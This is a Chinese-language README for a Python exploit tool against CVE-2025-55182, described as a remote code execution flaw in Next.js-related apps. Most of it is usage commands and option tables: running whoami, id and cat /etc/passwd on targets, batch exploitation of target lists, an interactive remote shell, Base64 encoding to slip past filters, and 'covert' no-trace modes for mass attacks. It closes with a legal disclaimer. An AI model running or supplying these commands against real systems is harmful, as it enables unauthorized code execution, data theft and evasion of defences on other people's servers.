
本工具用于检测和利用 CVE-2025-55182 漏洞(推测为 Next.js 相关框架的代码执行漏洞),支持单目标/多目标批量检测、命令执行、交互式shell等功能,提供4种攻击模式适配不同场景,支持Base64编码命令、代理转发、日志输出等灵活配置。
CVE-2025-55182 漏洞可能存在于 Next.js 相关应用中,通过构造恶意请求篡改 _response 中的执行逻辑,注入 child_process 模块调用,实现远程命令执行(RCE)。工具通过发送特制的表单数据,触发漏洞并返回命令执行结果。
requestspip install requests
# 执行 whoami 命令(攻击模式1:有响应)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# 执行系统命令(Base64编码,避免特殊字符拦截)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# 完整回复模式(Base64解码返回结果)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# 从文件读取目标URL,批量执行 id 命令(20线程)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# 连接目标,进入交互式命令行(支持Base64编码切换)
python CVE-2025-55182-exploit.py -u https://target.com -s
# 通过Burp Suite代理抓包分析
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
进入 -s 模式后,支持以下内置命令:
| 命令 | 功能描述 |
|---|---|
b64 | 切换到Base64编码命令模式 |
nob64 | 退出Base64编码模式 |
exit | 退出交互式shell |
? |
--outlog 指定的文件,便于后续分析;-u 与 -l 二选一,同时指定时优先使用 -u;-c 与 -s 互斥,-s 模式下无需指定 -c;-l 文件中的URL无协议头(如 target.com),工具会自动尝试 http:// 和 https://;https://target.com),避免不必要的连接失败;-b 或 b64 模式时,工具会自动处理Base64编码/解码,无需手动操作;--skip-check 跳过检测;-p 4 完整回复模式);-b)避免命令被目标系统拦截;--time-out 超时时间;http://target.com)。本工具仅用于网络安全研究和漏洞验证,使用者因违反《网络安全法》等相关法律法规造成的一切后果,均由使用者自行承担,与工具开发者无关。
| 参数名 | 简写 | 必选 | 描述 | 示例 |
|---|
--url | -u | 否 | 单个目标URL(与 -l 二选一,优先使用 -u) | -u https://target.com |
--url-list | -l | 否 | 目标URL列表文件(每行一个URL,支持无协议头,自动补http/https) | -l urls.txt |
--payload | -p | 否 | 攻击模式(默认:1) 1=有响应(execSync) | 2=无响应(execSync) 3=无响应(exec) |
--cmd | -c | 否 | 待执行的系统命令(批量模式/单目标命令执行必选,与 -s 互斥) | -c "whoami" 或 -c "dir" |
--threads | -t | 否 | 批量检测线程数(默认:10,建议不超过50) | -t 20 |
--outlog | -o | 否 | 日志输出文件(默认:cve-2025-55182.log) | -o exploit.log |
--base64 | -b | 否 | 对 -c 指定的命令进行Base64编码(避免特殊字符被拦截) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | 否 | 交互式shell模式(仅支持单目标 -u,与 -c 互斥) | -u https://target.com -s |
--proxy | - | 否 | 代理配置(支持HTTP/HTTPS代理,用于抓包或流量转发) | --proxy http://127.0.0.1:8080 |
--skip-check | - | 否 | 跳过代理连通性检测(默认会验证代理可用性) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out | - | 否 | 请求超时时间(单位:秒,默认:10) | --time-out 15 |
| 模式编号 | 模式描述 | 特点 | 适用场景 |
|---|
| 1 | 有响应(execSync) | 同步执行命令,返回303重定向,结果包含在响应头中 | 快速验证漏洞是否存在 |
| 2 | 无响应(execSync) | 同步执行命令,无返回结果(需通过其他方式确认执行效果) | 隐蔽执行操作 |
| 3 | 无响应(exec) | 异步执行命令,无返回结果(低痕迹,适合无需确认的操作) | 隐蔽批量攻击 |
| 4 | 完整回复 | 同步执行命令,结果Base64编码后返回在响应体中(工具自动解码) | 需查看完整命令输出的场景 |
| 查看帮助信息 |
--time-out 超时时间,避免误判。